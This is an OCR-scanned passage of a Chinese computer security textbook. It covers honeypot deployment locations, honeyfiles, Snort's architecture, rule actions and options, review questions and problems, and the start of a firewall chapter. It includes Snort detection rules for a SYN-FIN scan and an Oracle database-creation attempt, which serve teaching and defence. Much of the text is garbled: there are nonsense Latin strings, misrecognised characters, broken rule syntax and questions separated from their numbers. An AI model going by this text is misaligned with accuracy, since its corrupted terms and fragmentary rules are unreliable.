个 网 络 ， 管 理 员 可 以 详细 观察 他 们 的 行为 ， 做 出 防范 方案 。 

蜜 饶 可 以 部 署 在 各 种 位 置 。 图 8-8 给 出 了 一 些 可 能 的 情况 。 位 置 取决 于 许多 因素 ， 如 企业 
有 兴趣 收集 的 信息 类 型 和 企业 为 获得 最 大 数量 数据 所 能 容忍 的 风险 级 别 。 
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服务 网 络 
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图 8-8 aes A hl 


外 部 防火 墙 之 外 (位置 1 ) WERE TIR AREE D2 E AREK 下 地 址 的 学 
试 非常 有 用 。 在 此 位 置 的 蜜 龟 不 会 增加 对 内 部 网 络 的 风险 ， 它 可 避免 在 防火 墙 后 的 系统 遭受 危 
险 。 而 且 ， 因 为 蜜 钠 吸 引 了 许多 潜在 的 攻击 ， 所 以 它 减少 了 由 防火 墙 和 内 部 IDS fe Bab 5 | 
的 警报 ,减轻 了 管理 负担 。 外 部 蜜 钢 的 缺点 是 它 捕 获 内 部 攻击 者 的 能 力 非常 有 限 ， 特 别 是 当 外 
部 防火 墙 在 两 个 方向 上 过 滤 通 信 流 量 时 。 

网 络 的 外 部 可 用 服务 (如 Web 和 邮件 ) 通常 被 称 为 DMZ GEEF), EMERE 
个 候选 位 置 (位 置 2 )。 安 全 管理 员 必 须 确保 蜜 钠 产 生 的 任何 活动 对 DMZ 中 的 其 他 系统 是 安全 
的 。 此 位 置 的 一 个 缺点 是 ， 典 型 的 DMZ 是 无 法 完全 访问 的 ， 防 火 墙 通常 会 阻止 试图 到 DMZ 
中 访问 不 需要 的 服务 的 流量 。 因 此 ， 防 火 墙 要 么 不 得 不 打开 在 其 允许 之 外 的 流量 ， 尽 管 这 是 很 
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危险 的 ， TARH Bete ACE 

SCE ARE (位 置 3 ) 有 几 个 优点 。 它 最 重要 的 优点 是 可 以 捕获 内 部 攻击 。 在 此 位 置 的 
蜜 饶 还 可 以 检测 到 错误 配置 的 防火 墙 ， 其 转发 从 Internet 到 内 部 网 络 本 不 允许 的 通信 量 。 它 还 
有 一 些 缺 点 。 最 严重 的 缺点 是 如 果 蜜 饶 被 破坏 ， 它 便 可 以 被 利用 来 攻击 内 部 的 其 他 系统 。 任 何 
从 Internet 到 攻击 者 的 更 多 通信 量 不 会 被 防火 墙 阻 止 ， 因 为 它 被 认为 仅 是 到 蜜 饶 的 通信 量 。 这 
个 蜜 缸 位 置 的 另 一 个 缺点 是 ， 与 位 置 2 一 样 ， 防 火 墙 必 须 调 整 过 滤 恬 以 允许 到 蜜 饶 的 通信 量 ， 
这 样 使 防火 墙 配 置 复 杂 化 并 可 能 导致 内 部 网 络 潜在 的 破坏 。 

一 个 新 兴 的 相关 技术 使 用 的 是 蜂蜜 文件 ， 它 用 真实 且 诱 人 的 名 字 和 可 能 的 内 容 来 模拟 合法 的 
文件 。 这 些 文 件 本 不 应 该 被 系统 的 合法 用 户 访问 ， 但 却 成 了 和 人 侵 者 探索 系统 的 诱饵 。 他 们 的 任何 
访问 被 认为 是 可 疑 的 [WHIT13]。 蜂 蜜 文件 的 适当 产生 、 安 置 和 监测 是 目前 研究 的 一 个 领域 。 


8.9 实例 系统 : Snort 


Snort 是 开源 、 高 度 可 配置 且 可 移植 的 基于 主机 或 基于 网 络 的 IDS。Snort 被 称 为 是 轻 量 级 
IDS， 它 具有 以 下 特征 : 

e 可 以 在 大 多 数 网 络 节点 〈 主 机 、 服 务 器 和 路 由 器 ) 轻松 地 部 署 。 

o 使 用 少量 的 内 存 和 处 理 器 时 间 进 行 高 效 操作 。 

e 系统 管理 员 可 以 容易 地 进行 配置 ， 以 便 在 较 短 时 间 内 实现 特定 的 安全 解决 方案 。 

Snort 可 以 进行 实时 数据 包 的 捕获 、 协 议 分 析 和 内 容 搜索 与 匹配 。 尽 管 Snort 可 以 通过 插 
件 扩 展 来 分 析 其 他 网 络 协 议 ， 但 它 主要 还 是 用 于 分 析 TCP、UDP、ICMP 协议 。Snort 根据 一 
组 由 系统 管理 员 配 置 的 规则 ， 能 够 检测 到 很 多 种 攻击 和 探测 。 


8.9.1 Snort 体系 结构 
一 个 Snort 安装 包括 4 个 逻辑 组 件 (如 图 8-9 所 示 ): 





图 8-9 Snort 体系 结构 


o 数据 包 解 码 器 (packet decoder): 数据 包 解 码 器 处 理 每 个 捕获 的 数据 包 ， 在 数据 链 路 、 
网 络 、 传 输 和 应 用 层 来 识别 和 隔离 协议 首部 。 解 码 器 需 尽 可 能 高 效 ， 它 的 主要 工作 包 
括 设置 指针 ， 以 便 可 以 很 容易 地 提取 各 种 协议 首部 。 

o 检测 引擎 ( detection engine): 检测 引擎 完成 人 侵 检测 的 实际 工作 。 本 模块 基于 一 组 由 
安全 管理 员 配置 的 Snort 规则 来 分 析 每 个 数据 包 。 从 本 质 上 讲 ， 每 个 数据 包 依 据 所 有 规 
则 进行 检查 ， 以 确定 该 数据 包 是 否 与 根据 规则 定义 的 特征 相 匹配 。 与 已 解码 的 数据 包 
匹配 的 第 一 个 规则 触发 规则 指定 的 动作 。 如 果 没 有 规则 匹配 该 数据 包 ， 则 检测 引擎 放 
弃 此 数据 包 。 
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e 记录 器 (logger): 对 于 每 个 与 规则 匹配 的 数据 包 ， 该 规则 指定 要 执行 的 日 志和 报警 选项 。 
当选 定 一 个 记录 器 选项 时 ， 记 录 融 将 检测 到 的 数据 包 以 可 读 格式 或 以 更 加 紧凑 的 二 进 制 
格式 存储 在 指定 的 日 志文 件 中 。 之 后 安全 管理 员 可 以 使 用 日 志文 件 进行 将 来 的 分 析 工 作 。 

e 报警 器 (alerter): 对 于 每 个 检测 到 的 数据 包 ， 发 送 一 个 警报 。 匹 配 规 则 中 的 警报 选项 
确定 事件 通知 中 包括 哪些 信息 。 事 件 通知 可 以 发 送 到 文件 、UNIX 套 接 字 (socket) 或 
者 数据 库 。 警 报 也 可 以 在 测试 或 渗透 研究 期 间 关 闭 。 使 用 UNIX 套 接 字 ， 可 以 将 通知 
发 送 到 网 络 上 其 他 地 方 的 管理 机 。 

Snort 可 以 配置 为 被 动 传感器 ， 监 控 不 在 主要 传输 路 径 上 的 网 络 流量 ; 也 可 以 配置 为 内 蔡 


传 感 硕 ， 所 有 数据 包 流 量 必须 通过 它 。 在 后 一 种 情况 下 ，Snort 可 以 实现 人 侵 防 护 以 及 人 侵 检 
测 的 功能 。 我 们 将 在 第 9 章 讨论 入 侵 防御 。 


8.9.2 Snort 规则 


单 ， 


Snort 使 用 一 种 简单 、 灵 活 的 规则 定义 语言 来 生成 检测 引擎 可 用 的 规则 。 尽 管 规则 非常 简 
可 以 直接 编写 ， 但 它们 的 功能 足以 检测 各 种 恶意 或 可 疑 的 网 络 流量 。 
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图 8-10 Snort 规则 格式 


每 个 规则 包括 一 个 固定 的 头 部 和 和 零 个 或 多 个 选项 (图 8-10 )。 头 部 包含 以 下 元 素 : 

© 动作 (action): 规则 动作 告诉 Snort 当 它 找到 符合 规则 条 件 的 数据 包 时 应 如 何 去 做 。 
表 8-3 列 出 了 可 用 的 动作 。 列 表 中 的 最 后 三 个 动作 (drop, reject, sdrop) REA HEE 
式 下 可 用 。 

e 协议 (protocol): Snort 继续 分 析 数 据 包 协议 是 否 匹 配 这 个 字段 。Snort 的 当前 版 本 ( 2.9 ) 
识别 四 个 协议 : TCP, UDP, ICMP AIP. Snort 的 未 来 版 本 将 支持 更 多 的 协议 。 

o 源 IP 地 址 (source IP address): 指明 数据 包 的 源 。 该 规则 可 以 指定 特定 的 全 地 址 、 任 
何 IP 地 址 和 特定 的 IP 地 址 列表 ， 或 者 拒绝 特定 的 IP 地 址 或 IP 地 址 列表 。 拒 绝 表 示 在 
列表 之 外 的 任何 IP 地 址 都 是 匹配 的 。 

e 源 端 口 (source port): 该 字段 用 于 指定 特定 协议 的 源 端 口 (如 TCP 端口 )。 可 以 以 多 种 方式 
指定 端口 号 ， 包 括 特定 端口 号 、 任 何 端 口 、 静 态 端 口 定义 、 端 口 范 围 和 拒绝 某 些 端口 。 

e 方向 (direction): 该 字段 采用 以 下 两 个 值 中 的 一 个 : 单 向 (unidirectional)( 一 > ) 或 双向 
( bidirectional) (二 一 > )。 双 向 选项 告诉 Snort 应 该 将 规则 中 的 地 址 /端口 对 理解 为 ， 前 面 
是 源 后 面 是 目的 ， 或 者 前 面 是 目的 后 面 是 源 。 双 向 选项 使 Snort 能 够 监控 对 话 的 双方 。 


表 8-3 Snort 规则 动作 


动 作 说 明 
alert 使 用 所 选 的 报警 方式 生成 警报 ， 再 将 数据 包 写 人 日 志 
log 将 数据 包 写 人 日 志 
pass 忽略 数据 包 


activate 报警 后 再 激活 另 一 个 dynamic 规则 


选项 ， 后 面 跟 的 参数 指定 选项 的 详细 信 ， 
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动 作 说 明 
dynamic 保持 空闲 直到 被 activate 规则 激活 ， 然 后 作为 log 规则 
drop 使 iptables 丢弃 数据 包 并 写 日 志 
was g 使 iptables 丢弃 数据 包 ， 记 入 日 志 ， 如 果 协 议 是 TCP， 则 发 送 TCP ER; WRH 
议 是 UDP， 则 发 送 ICMP 端口 不 可 达 消 息 
sdrop 使 iptables 丢弃 数据 包 但 不 写 日 志 


e 目的 IP 地址 (destination IP address): 指明 数据 包 的 目的 地 。 
© 目的 端口 (destination port): 指明 目的 端口 。 
在 规则 头 部 之 后 可 以 有 一 个 或 多 个 规则 选项 。 每 个 选项 由 选项 关键 字 组 成 ， 关 键 字 定义 


昌 。 在 书面 形式 中 ， 规 则 选项 集 被 括 在 括号 中 与 头 部 分 


FF. Snort 规则 选项 用 分 号 G) 分 隔 。 规 则 选项 关键 字 与 其 参数 用 冒号 C) 分 隔 。 282 


有 4 个 主要 类 别 的 规则 选项 : 
e 元 数据 (meta-data): 提供 关于 规则 的 信息 ， 但 在 检测 期 间 不 起 任何 作用 。 
e 载荷 (payload): 查找 有 效 载 集 数 据 包 中 的 数据 ， 可 以 是 相关 的 。 


e 非 载荷 (non-payload): ÆR FR BE 。 


e 后 检测 (post-detection ): 


当 规则 匹配 一 个 数据 包 后 引发 的 特定 规则 。 


表 8-4 提供 了 每 个 类 别 中 的 选项 实例 。 


表 8-4 Snort 规则 选项 实例 


msg 当 一 个 数据 包 生 成 一 个 事件 时 ， 定 义 要 发 送 的 消息 
元 数据 | reference 定义 了 到 外 部 攻击 识别 系统 的 链接 ， 该 系统 可 以 提供 额外 信息 
classtype ”指出 数据 包 尝 试 的 攻击 类 型 
content ff Snort 对 数据 包 有 效 载 集中 的 特定 内 容 (文本 和 /或 二 进 制 ) 执行 区 分 大 小 写 的 搜索 
载荷 depth 指定 Snort 对 于 给 定 模 式 ， 在 数据 包 中 的 搜索 深度 。depth 修改 规则 中 的 前 一 个 content 关键 字 
offset 指定 对 于 给 定 模式 ， 在 数据 包 中 的 起 始 搜 索 位 置 。offset 修改 规则 中 的 前 一 个 content KRF 
nocase Snort 应 该 在 查找 特定 模式 时 忽略 大 小 写 。nocase 修改 规则 中 的 前 一 个 content 关键 字 
ttl 检查 IP 的 生存 时 间 (time-to-live) 值 。 此 选项 意 在 检测 traceroute 尝试 
id 检查 IP 的 ID 字段 是 否 为 某 个 特定 值 。 某 些 工具 (漏洞 检测 、 扫 描 器 和 其 他 恶意 程序 ) 特别 设 
置 该 字段 用 于 各 种 用 途 ， 例 如 值 31337 经 常 被 某 些 黑客 使 用 
dsize 测试 数据 包 有 效 载 往 的 大 小 。 这 可 以 用 来 检查 异常 大 小 的 数据 包 。 很 多 情况 下 ， 这 对 于 检测 缓 
非 载荷 冲 区 溢出 是 非常 有 用 的 
flags 测试 TCP 标志 是 否 为 指定 设置 
seq 寻找 指定 的 TCP 首部 序列 号 
icmp-id ”检查 ICMP ID 值 是 否 是 指定 值 。 这 很 有 和 用， 因为 某 些 隐蔽 通道 程序 通信 时 使 用 静态 ICMP F 
段 。 开 发 这 个 选项 用 来 检测 stacheldraht DDoS 代理 
logto 把 与 规则 相 匹 配 的 数据 包 写 入 指定 的 日 志文 件 
后 检测 | session M TCP 会 话 中 提取 用 户 数据 。 很 多 情况 下 ， 其 用 来 查看 用 户 在 telnet, rlogin, fip 甚至 Web 会 


话 中 输入 的 内 容 是 很 有 用 的 


下 面 是 Snort 规则 的 一 个 实例 : 


Alert tcp $EXTERNAL_NET any -> $HOME_NET any\ 


(msg: 
reference: 


“SCAN SYN FIN” flags: SF, 
arachnids, 


12; \ 


198; classtype: attempted-recon; ) 
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在 Snort 中 ,保留 的 反 斜 杠 字 符 “\” 用 于 续 行 。 本 实例 用 于 检测 TCP 级 的 一 种 叫 作 SYN- 
FIN 的 攻击 。 变 量 名 $SEXTERNAL NET 和 $ HOME NET 是 预定 义 的 ， 用 来 指定 特定 网 络 。 
在 本 例 中 ， 任 何 源 端口 或 目的 端口 被 指定 。 本 例 在 忽略 八 位 标志 中 的 保留 位 1 和 保留 位 2 的 
情况 下 检查 是 否 仅 仅 SYN 和 FIN 位 被 置 位 。reference 选项 指出 这 种 攻击 的 外 部 定义 ， 它 是 


attempted-recon 类 型 的 攻击 。 
8.10 ”关键 术语 、 复 习题 和 习题 


关键 术语 


anomaly detection (异常 检测 ) 

banner grabbing (标题 抓 取 ) 

base-rate fallacy ( 基 率 详 误 ) 

false negative (HFR ) 

false positive (RR ) 

hacker (黑客 ) 

honeypot (fë ) 

host-based IDS (基于 主机 的 IDS) 

inline sensor (内 骸 传 感 絮 ) 

intruder (入 侵 者 ) 

intrusion detection (人 侵 检 测 ) 

intrusion detection exchange format (和 人 侵 检 测 交换 
格式 ) 


复习 题 
8.1 列 出 并 简要 定义 4 类 入 侵 者 。 


Intrusion Detection System (IDS， 入 侵 检 测 系统 ) 

Network-based IDS (NIDS， 基 于 网 络 的 IDS) 

network sensor (网 络 传 感 需 ) 

passive sensor (WEZ EIRAN ) 

rule-based anomaly detection (基于 规则 的 异常 检测 ) 

rule-based heuristic identification (基于 规则 的 启发 
式 识 别 ) 

rule-based penetration identification (基于 规则 的 渗 
透 识别 ) 

security intrusion (安全 人 侵 ) 

scanning ( 扫 摘 ) 

signature approaches (特征 方法 ) 

signature detection (特征 检测 ) 


8.2 列 出 并 简要 描述 入 侵 者 攻击 系统 时 通常 所 使 用 的 步 桑 。 


8.3 给 出 和 人 侵 者 每 个 攻击 步骤 的 一 个 实例 。 
8.4 描述 IDS 的 三 个 逻辑 组 件 。 


8.5 ”描述 基于 主机 的 IDS 和 基于 网 络 的 IDS 之 间 的 区 别 。 它 们 组 合 到 一 起 有 怎样 的 优势 ? 


8.6 IDS 的 三 个 优点 是 什么 ? 

8.7 在 IDS 中 ， 漏 报 和 误 报 的 区 别 是 什么 ? 
8.8 解释 基 率 廖 误 。 

8.9 列 出 IDS 的 一 些 理想 特征 。 

8.10 
8.11 列 出 并 简要 描述 异常 检测 系统 的 三 种 分 类 。 
8.12 列 出 几 种 用 在 异 稼 检测 中 的 机 器 学 习 方 法 ? 
8.13 
8.14 
8.15 
8.16 
8.17 
8.18 
8.19 
8.20 


列 出 并 简要 摘 述 用 在 HIDS 中 的 数据 源 ? 


描述 应 用 在 NIDS 中 的 传感器 类 型 。 
NIDS 中 传感器 的 可 能 位 置 是 什么 ? 


使 用 分 布 式 或 混合 式 IDS 的 动机 是 什么 ? 


异常 检测 和 特征 或 启发 式 入 侵 检测 的 区 别 是 什么 ? 
特征 检测 和 基于 规则 的 启发 式 识 别 的 区 别 是 什么 ? 
基于 异常 的 HIDS、 基 于 特征 或 启发 式 检测 的 HIDS， 三 者 中 哪 一 个 应 用 得 更 普遍 ?为 什么 ? 


分 布 式 HIDS 相对 于 单 系统 HIDS 的 优势 是 什么 ? 


异常 检测 或 特征 和 启发 式 检 测 哪 一 种 被 用 在 NIDS 中 ， 还 是 二 者 均 被 应 用 ? 
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8.21 ” 蜜 钢 是 什么 ? 
8.22” 列 出 并 简要 描述 可 以 被 部 署 的 两 类 蜜 饮 ? 


习题 


8.1 考虑 一 下 我 们 描述 的 普通 攻击 方法 的 第 一 步 ， 即 收集 待 攻 击 目 标的 公开 信息 。 什 么 类 型 的 信息 可 以 
被 使 用 ? 有 关 这 些 信息 的 内 容 和 细节 的 使 用 给 了 你 什么 启发 ?与 公司 的 商业 和 法 律 要 求 的 关联 是 怎 
样 的 ?如何 调和 这 些 冲突 的 要 求 ? 

8.2 在 IDS 上 下 文中 , 我 们 定义 误 报 是 IDS 对 于 本 来 正常 的 情况 产生 警报 。 漏 报 是 指 IDS 对 于 正在 发 生 
的 应 该 报警 的 情况 没有 报警 。 在 下 图 中 ,分 别 用 两 条 曲线 大 致 表示 误 报 和 汤 报 。 


报警 频率 
更 不 具体 保留 特征 更 具体 
或 更 宽松 或 更 严格 
8.3 ”无线 网 络 因 其 传输 的 广播 特性 ， 提 出 了 与 有 线 网 络 不 同 的 NIDS 部 署 问 题 。 讨 论 在 决定 无 线 NIDS 
传感器 的 位 置 时 ， 应 该 注意 考虑 的 事项 。 285 


8.4 Snort 中 的 一 个 非 载 和 荷 选项 是 fow。 此 选项 区 分 客户 端 和 服务 器 。 此 选项 可 用 于 指定 仅 匹 配 在 一 个 
方向 上 流动 的 数据 包 (客户 端 到 服务 器 或 者 相反 )， 并 可 指定 仅 匹 配 已 建立 的 TCP 连接 。 请 考虑 以 
下 Snort 规则 ; 


alert tcp $EXTERNAL_NET any -> $SQL_SERVERS SORACLESPORTS\ 
(msg: "ORACLE create database attempt: ;\ 

flow: to_server, established; content: "create database"; 
nocase; \ 


classtype: protocol-command-decode;; ) 


a. 此 规则 是 做 什么 的 ? 
b. 如 果 Snort 设备 放 在 外 部 防火 墙 的 内 部 或 外 部 ， 分 别 说 明 此 规则 的 重要 性 。 

85 图 8-1 中 两 个 概率 密度 函数 的 重 玲 区域 表示 区 域 中 误 报 和 漏 报 的 可 能 性 。 而 且 ， 图 8-1 是 理想 化 的 ， 
并 不 一 定 代表 两 个 密度 函数 的 相对 性 状 。 假 设 每 1000 个 授权 用 户 中 有 1 个 实际 的 入 侵 ， EAK 
占 授权 用 户 的 1% 和 入 侵 者 的 50%. 
a. 画 出 这 样 一 组 密度 函数 ， 并 证 明 上 述 描述 并 不 合理 。 
b. 此 区 域 中 发 生 授权 用 户 的 事件 的 概率 是 多 少 ? 请 记 住 所 有 入 侵 的 50% 属于 此 区 域 。 - 

8.6 ”基于 主机 的 入 侵 检 测 工 具 的 一 个 实例 是 tripwire 程序 。 这 是 一 个 文件 完整 性 检查 工具 ， 它 定期 在 系 
统 上 扫描 文件 和 目录 ， 并 告知 管理 员 它 们 的 任何 更 改 。 扫 描 时 ， 对 于 每 个 被 检查 的 文件 ， 该 工具 将 
其 在 受 保护 数据 库 中 存储 的 密码 校 验 和 与 重新 计算 得 出 的 值 进行 比较 。 它 必须 配置 要 检查 的 文件 和 
目录 列表 ， 以 及 对 于 每 个 列表 项 哪些 变化 是 允许 的 (如 果 有 变化 的 话 )。 例 如 它 可 以 允许 日 志文 件 附 
加 新 条 目 ， 而 不 是 对 已 有 条 目 进行 更 改 。 使 用 这 样 的 工具 的 优点 和 缺点 是 什么 ?如 果 考 虑 到 需要 确 
定 哪些 文件 应 该 很 少 更 改 ， 哪 些 文件 可 能 会 更 经 常 更 改 及 如 何 更 改 ， 哪 些 文件 会 频繁 更 改 等 问题 ， 
则 无 法 检测 。 因 此 ， 考 虑 在 程序 配置 和 系统 管理 员 监 控 生 成 啊 应 这 两 方面 需要 完成 的 工作 。 

8.7 一 个 分 布 式 NIDS 由 网 络 中 两 个 节点 监控 异常 的 输入 流量 。 此 外 ， 还 有 一 个 中 央 节 点 ， 用 于 在 收 到 
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两 个 分 布 式 节点 的 输入 信号 后 生成 报警 信号 。 到 两 个 IDS 节点 的 输入 流量 的 特征 服从 四 种 模式 之 
一 : Pl, P2, P3 和 P4。 威 胁 等 级 划分 由 中 央 节 点 根据 给 定时 间 内 两 个 NIDS 的 观测 流量 确定 ， 在 
下 表 中 给 出 ， 


威胁 等 级 特 {E 
低 1P1+1P2 
中 1P3+1P4 
高 2 P4 


如 果 在 给 定 的 时 间 ， 至 少 有 一 个 分 布 式 节点 产生 报警 信号 PS, ， 则 观察 到 的 网 络 流 量 将 被 划分 为 中 等 
威胁 级 别 的 概率 是 多 少 ? 
一 辆 出 租车 涉及 夜间 发 生 的 一 起 致命 交通 事故 的 向 事 逃 逸 。 在 该 城市 中 有 两 家 出 租车 公司 ， 分 别 为 
Green 公司 和 Blue 公司 。 已 知 : 
e 此 城市 中 的 出 租车 85% 是 Green 公司 的 ，15% 是 Blue 公司 的 。 
e 一 个 目击 者 证 实 秘 事 车 辆 属于 Blue 公司 。 
法 庭 测试 了 目击 者 在 夜间 发 生 的 交通 事故 中 作证 的 可 靠 性 ， 得 出 目击 者 正确 识别 出 租车 颜色 的 概率 
为 80%。 请 问 秘 事 出 租车 属于 Blue 公司 而 非 Green 公司 的 概率 是 多 少 ? 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
解释 防火 墙 作 为 计算 机 和 网 络 安全 策略 的 一 部 分 所 起 到 的 作用 ; 
列举 防火 墙 的 关键 特征 ; 


讨论 防火 墙 的 各 种 基本 选项 ，; 
理解 防火 墙 部 署 和 配置 的 不 同 选择 所 带 来 的 相对 优点 ; 
区 分 防火 墙 和 入 侵 防 御 系 统 。 


防火 墙 能 够 有 效 地 保护 本 地 系统 或 网 络 免 受 基于 网 络 的 安全 威胁 ， 同 时 支持 通过 广域网 或 
Internet 访问 外 部 世界 。 
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企业 、 政 府 部 门 和 其 他 一 些 机 构 的 信息 系统 都 经 历 了 一 个 稳定 的 发 展 过 程 。 以 下 是 一 些 里 
程 碑 式 的 进展 ; 

e 集中 式 数 据 处 理 系统 ,包括 一 个 可 文 持 许多 终端 与 其 直接 连接 的 中 央 大 型 机 系统 。 

e 局 域 网 (Local Area Network, LAN) 将 个 人 计算 机 和 终端 互联 ， 并 与 大 型 机 系统 互联 。 

e 驻地 网 (premise network)， 由 许多 局 域 网 组 成 ， 将 个 人 计算 机 、 服 务 需 以 及 一 台 或 者 

两 台大 型 机 相互 连接 起 来 。 

e 企业 级 网 络 (enterprise-wide network)， 由 通过 专用 广域网 (wide area network) 连接 起 
来 的 多 个 不 同 地 理 分 布 的 驻地 网 组 成 。 
Internet 连通 性 ( Internet connectivity)， 其 中 多 个 驻地 网 都 连接 到 Intermnet， 各 个 驻地 网 
可 以 通过 专用 广域网 连接 ， 也 可 以 不 通过 专用 广域网 连接 。 

e 企业 云 计算 〈enterprise cloud computing) 拥有 位 于 一 个 或 多 个 数据 中 心 的 虚拟 服务 雁 ， 

可 以 提供 组 织 内 部 或 对 外 的 Internet 服务 。 我 们 将 在 第 13 章 中 进一步 介绍 。 

如 今 ， 对 于 大 多 数 机 构 而 言 ， 与 Internet 的 连接 已 经 不 再 是 可 有 可 无 的 了 ， 因 为 Internet 
上 大 量 的 信息 和 服务 对 于 他 们 来 说 是 非常 重要 的 。 而 且 ， 机 构 内 部 的 个 人 用 户 同 样 需要 访问 
Internet， 如 果 他 们 所 处 的 局 域 网 不 能 提供 这 种 访问 ， 他 们 将 会 通过 无 线 宽 带 的 方式 从 他 们 的 
PC 机 连接 到 Internet 服务 提供 商 (Internet Service Provider, ISP), {H4z, Internet 给 机 构 提 供 便 
利 的 同时 ， 也 使 得 外 部 的 世界 能 够 接触 到 本 地 网 络 资源 并 对 其 产生 影响 ， 这 就 会 对 机 构 产 生 威 
胁 。 虽 然 给 驻地 网 中 的 工作 站 和 服务 器 配置 强大 的 安全 特性 是 可 能 的 ， 例 如 入 侵 保护 ， 但 这 也 
许 不 能 满足 要 求 ， 而 且 在 某 些 情况 下 是 不 划算 的 。 考 虑 一 个 有 着 数 百 个 甚至 数 千 个 系统 的 网 
络 ， 其 中 混杂 运行 着 各 种 各 样 的 操作 系统 ， 比 如 不 同 版 本 的 Windows, Mac OS X 和 Linux。 当 
发 现 一 个 安全 缺陷 时 ， 所 有 受到 潜在 影响 的 系统 都 必须 升级 以 修补 这 个 缺陷 。 这 要 求 可 扩展 的 
(scaleable) 配置 管理 和 积极 的 修补 以 保证 运行 的 效率 。 如 果 仅 使 用 基于 主机 的 安全 措施 ， 尽 管 
这 很 困难 ， 但 是 这 种 方法 是 可 行 而 且 是 必要 的 。 一 种 被 人 们 广泛 接受 的 代替 方法 ， 或 者 至 少 说 
是 对 基于 主机 的 安全 服务 的 一 种 补充 ， 就 是 防火 墙 。 防 火 墙 设 置 在 驻地 网 和 Internet 之 间 ， 以 





204 READ HHEMKEARKSRE 


EMAER, PSA eb Be SE NF KARR A FAY AER 
护 驻地 网 不 受 源 于 Internet 的 攻击 ， 提 供 一 个 能 加 强 安全 和 审计 的 遏制 点 ( single choke point). 
防火 墙 可 以 是 单机 系统 ， 也 可 以 是 协作 完成 防火 墙 功 能 的 两 个 或 者 更 多 系统 。 

防火 墙 还 创建 了 一 个 附加 的 防御 层 ， 将 内 部 系统 和 外 部 网 络 隔 离开 来 。 这 是 遵循 “纵深 防 
fi)” (defense in depth) 的 古典 军事 理论 ， 该 思想 恰恰 也 适用 于 IT 安全 。 


9.2 防火墙 的 特征 和 访问 策略 


[BELL94] 列 出 了 以 下 的 防火 墙 设计 目标 : 
1. 所 有 从 内 部 到 外 部 的 流量 都 必须 通过 防火 墙 ， 反之 亦 然 。 这 是 通过 在 物理 上 隔断 除了 通 
过 防火 墙 之 外 的 所 有 对 本 地 网 络 的 访问 来 实现 的 。 多 种 配置 方式 都 是 可 行 的 ， 在 本 章 的 后 续 部 
分 会 对 其 进行 解释 。 
2. 只 有 经 过 授权 的 网 络 流 量 ， 例 如 符合 本 地 安全 策略 定义 的 流量 ， 防 火场 才 允 许 其 通过 。 
可 以 使 用 不 同类 型 的 防火 墙 实现 不 同 的 安全 策略 ， 本 章 的 后 续 部 分 会 对 其 进行 解释 。 
3. 防火 墙 本 喘 不 能 被 渗透 。 这 意味 着 要 使 用 具有 安全 操作 系统 的 强化 系统 ,我们 将 在 第 
12 革 中 描述 。 
指定 合适 的 访问 策略 是 防火 墙 的 规划 和 实施 过 程 的 关键 部 分 。 策 略 中 会 列 出 可 以 通过 防火 
墙 的 合法 流量 类 型 ， 包 括 地 址 范围 、 协 议 、 应 用 程序 、 内 容 类 型 等 。 该 策略 应 由 企业 的 信息 安 
全 风险 评估 和 策略 部 门 进行 制定 ， 我 们 会 在 第 14 章 和 第 15 章 进 行 介 绍 。 访 问 策略 先是 根据 一 
个 较为 广义 的 规范 来 进行 制定 ， 即 公司 需要 文 持 哪些 类 型 的 流量 。 之 后 ， 这 些 策略 会 被 提炼 为 
有 具体 的 过 滤器 ， 被 部 署 在 合适 的 防火 墙 拓扑 中 。 
NIST SP 800-41 (防火 墙 和 防火 墙 策略 指南 ，2009 年 9 月 ) 列 出 了 一 些 可 以 用 来 过 滤 流 量 
的 防火 墙 访问 策略 的 特征 : 
o IP 地 址 和 协议 值 (IP Address and Protocol Value); 这 是 基于 源 地 址 或 目的 地 址 、 端 口号 、 
和 人 站 或 出 站 的 网 络 流 方向 ， 以 及 其 他 网 络 层 和 传输 层 特 征 进 行 的 访问 控制 。 这 种 类 型 
的 过 滤 兹 被 滤 包 器 和 状态 检测 防火 墙 使 用 ， 以 限制 对 特定 服务 的 访问 。 

© 应 用 层 协 议 ( Application Protocol): 这 是 以 授权 的 应 用 层 协 议 数 据 为 基础 的 访问 控制 。 
此 类 过 滤器 通常 被 应 用 层 网 关 所 使 用 ， 且 网 关 主 要 用 于 转发 和 监控 特定 应 用 层 协议 的 
言 息 交 换 。 例 如 检查 简单 邮件 传输 协议 ( Simple Mail Transfer Protocol, SMTP) 的 垃圾 
邮件 ,或 者 只 发 到 授权 网 站 的 HTTP Web 请 求 。 

e 用 户 身 份 (User Identity): 这 是 基于 用 户 喘 份 的 访问 控制 ， 通 常用 于 那些 需要 确认 自己 

正在 使 用 某 种 形式 的 安全 认证 技术 的 内 部 用 户 ， 例 如 第 22 章 提 到 的 IPSec。 

e 网 络 活动 ( Network Activity): 这 是 基于 时 间或 请 求 等 注意 事项 的 访问 控制 。 例 如 限定 

在 工作 时 间 、 请 求 频率 、 检 测 扫描 请 求 或 其 他 行为 模式 。 

在 进一步 阐述 防火 场 类 型 和 配置 细节 之 前 ， 最 好 总 结 一 下 防火 墙 的 预期 作用 。 下 面 的 功能 
都 属于 防火 墙 应 具备 的 : 

1. 防火 寺 定 义 一 个 遏制 点 ， 用 于 把 未 授权 用 户 阻 止 在 受 保护 的 网 络 之 外 ， 阻 止 有 潜在 安全 
威胁 的 服务 进入 或 者 离开 网 络 ， 并 且 防 止 各 种 了 王 假 骨 攻 击 和 路 由 攻击 。 使 用 遏制 点 简化 了 安 
全 管理 ， 因 为 单 系统 或 多 系统 的 安全 性 被 巩固 了 。 

2. 防火 墙 提供 了 监视 安全 相关 事件 的 场所 。 防 火 墙 系统 可 以 执行 审计 和 警告 。 

3. 防火 墙 可 以 为 多 种 与 安全 不 相关 的 Internet 功能 的 实现 提供 一 个 便利 的 平台 。 这 些 功 能 
包括 网 络 地 址 转换 右 ， 用 于 将 本 地 地 址 映射 到 Internet 地 址 ; 还 包括 网 络 管理 功能 ， 用 于 审计 
或 记录 Internet 的 使 用 情况 。 
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4. 防火 墙 可 以 作为 IPSec 的 平台 。 使 用 第 22 章 描述 的 隧道 功能 ， 防 火 墙 能 够 实现 虚拟 专 
用 网 (Virtual Private Network, VPN) 功能 。 

防火 墙 也 有 其 局 限 性 ， 主 要 表现 在 : 

1. 防火 墙 不 能 阻止 那些 绕 开 防火 墙 的 攻击 。 内 部 系统 可 能 具有 有 线 或 者 移动 宽 寓 连接 到 
ISP 的 功能 。 内 部 局 域 网 可 能 直接 连接 到 绕 过 防火 墙 的 对 等 组 织 。 

